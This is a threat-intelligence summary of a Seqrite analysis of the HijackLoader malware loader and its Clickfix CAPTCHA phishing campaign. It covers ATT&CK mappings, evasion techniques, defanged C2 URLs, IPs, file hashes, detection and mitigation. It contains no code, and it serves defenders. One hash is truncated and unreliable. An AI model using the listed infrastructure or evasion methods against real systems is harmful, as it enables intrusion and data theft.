Full Report
Table of Contents Introduction The Evolving Threat of Attack Loaders Objective of This Blog Technical Methodology and Analysis Initial Access and Social Engineering Multi-Stage Obfuscation and De-obfuscation Anti-Analysis Techniques The Final Payload Conclusion IOCs Quick Heal \ Seqrite Protection MITRE ATT&CK Mapping Introduction With the evolution of cyber threats, the final execution of a […] The post Deconstructing a Cyber Deception: An Analysis of the Clickfix HijackLoader Phishing Campaign appeared first on Blogs on Information Technology, Network & Cybersecurity | Seqrite.
Analysis Summary
# Tool/Technique: HijackLoader
## Overview
HijackLoader is an attack loader that functions as a Malware-as-a-Service (MaaS) tool, designed to circumvent security defenses, establish persistence, and covertly deliver sophisticated, final-stage malware payloads (such as stealers and RATs) within compromised environments. It gained prominence in the latter half of 2023.
## Technical Details
- Type: Malware (Loader)
- Platform: Windows (Implied by use of PowerShell, HTA, Registry, and WOW64 syscalls)
- Capabilities: Initial access facilitation, multi-stage obfuscation/de-obfuscation, advanced evasion techniques (e.g., process doppelgänging, DLL unhooking, direct syscalls), persistence establishment, and deployment of secondary payloads like DeerStealer.
- First Seen: Second half of 2023
## MITRE ATT&CK Mapping
- [TA0001 - Initial Access]
- [T1566.002 - Phishing: Spearphishing Link] (Via Clickfix CAPTCHA campaign)
- [T1189 - Drive-by Compromise] (Via fake installers, malvertising, SEO-poisoned sites)
- [TA0002 - Execution]
- [T1059.001 - Command and Scripting Interpreter: PowerShell]
- [TA0005 - Defense Evasion]
- [T1027 - Obfuscated Files or Information]
- [T1140 - Deobfuscate/Decode Files or Information]
- [T1562.001 - Impair Defenses: Disable or Modify Tools] (Unhooking DLLs)
- [T1211 - Exploitation for Defense Evasion] (Direct syscalls under WOW64)
- [T1036 - Masquerading] (.mp3 extension used for PowerShell scripts)
- [TA0007 - Discovery]
- [T1082 - System Information Discovery] (Anti-VM checks)
- [T1497.001 - Virtualization/Sandbox Evasion: System Checks] (Checks VirtualBox identifiers)
- [TA0003 - Persistence]
- [T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys]
- [TA0008 - Privilege Escalation]
- [T1055 - Process Injection] (PE injection routines mentioned)
- [TA0011 - Command and Control]
- [T1071.001 - Application Layer Protocol: Web Protocols]
- [TA0009 - Collection]
- [T1056 - Input Capture]
- [T1005 - Data from Local System] (Via final stealer payload)
## Functionality
### Core Capabilities
- Delivering secondary payloads (Stealers, RATs).
- Multi-stage infection chain utilizing HTA droppers and heavily obfuscated PowerShell scripts.
- Initial distribution via deceptive means like CAPTCHA phishing (dubbed "Clickfix" in this campaign), fake installers, malvertising, and compromised web portals.
- Utilizing complex string reconstruction via mathematical operations to evade static analysis.
### Advanced Features
- Advanced evasion techniques:
- Process doppelgänging using transacted sections.
- Unhooking of system DLLs.
- Execution via direct syscalls specifically tailored for the WOW64 environment.
- Sophisticated call-stack spoofing.
- Robust anti-virtual machine/sandbox checks (including inspection of running processes and specific VirtualBox identifiers).
## Indicators of Compromise
- File Hashes:
- `fa695f0abcabe218ac0fc2d7bc72c4c3af84a52d0218a82`
- `52273e057552d886effa29cd2e78836e906ca167f65dd8a6b6a6c1708ffdfcfd`
- `c03eedf04f19fcce9c9b4e5ad1b0f7b69abc4bce7fb551833f37c81acf2c041e`
- `D0068b92aced77b7a54bd8722ad0fd1037a28821d370cf7e67cbf6fd70a608c4`
- `50258134199482753e9ba3e04d8265d5f64d73a5099f689abcd1c93b5a1b80ee`
- File Names: `samie_bower.mp3` (used for a PowerShell script)
- Registry Keys: Registry key modification observed for persistence (T1547.001).
- Network Indicators:
- `hxxps[:]//rs[.]mezi[.]bet/samie_bower.mp3` (C2 download URL)
- `hxxps[:]//1h[.]vuregyy1[.]ru/3g2bzgrevl[.]hta`
- `hxxp[:]//77[.]91[.]101[.]66/`
- `91[.]212[.]166[.]51` (IP address)
- `37[.]27[.]165[.]65:1477` (IP:Port)
- `cosi[.]com[.]ar` (Domain used for C2/download)
- Behavioral Indicators: Execution chain starting with CAPTCHA page -> HTA dropper -> PowerShell execution -> downloading remote scripts -> Anti-VM assessment.
## Associated Threat Actors
- Financially motivated threat actors (using HijackLoader as MaaS).
- TAG-150 (Observed leveraging HijackLoader alongside CastleLoader/CastleBot).
## Detection Methods
- Signature-based detection: Identified by Seqrite protection as `Script.Trojan.49900.GC`, `Loader.StealerDropperCiR`, `Trojan.InfoStealerCiR`, `Trojan.Agent`, and `BDS/511`.
- Behavioral detection: Monitoring for heavily obfuscated PowerShell execution, dynamic string construction, DLL unhooking attempts, and system information queries targeting virtualization artifacts (like VirtualBox identifiers).
- YARA rules: Not explicitly provided, but necessary for detecting specific obfuscation patterns.
## Mitigation Strategies
- Implement robust email and web filtering to block access to sites hosting fake installers or delivering CAPTCHA lures.
- Employ Endpoint Detection and Response (EDR) solutions capable of monitoring for dynamic analysis evasion techniques (e.g., direct syscalls, DLL unhooking).
- Maintain strict application control policies to restrict execution from unusual file types (like HTA or scripts masquerading with `.mp3` extensions).
- Harden systems against registry modifications intended for persistence (T1547.001).
## Related Tools/Techniques
- **Final Payload:** DeerStealer (observed being downloaded).
- **Co-used Loader:** CastleLoader/CastleBot.
- **Initial Vector Theme:** Clickfix (The name given to the specific CAPTCHA phishing technique observed).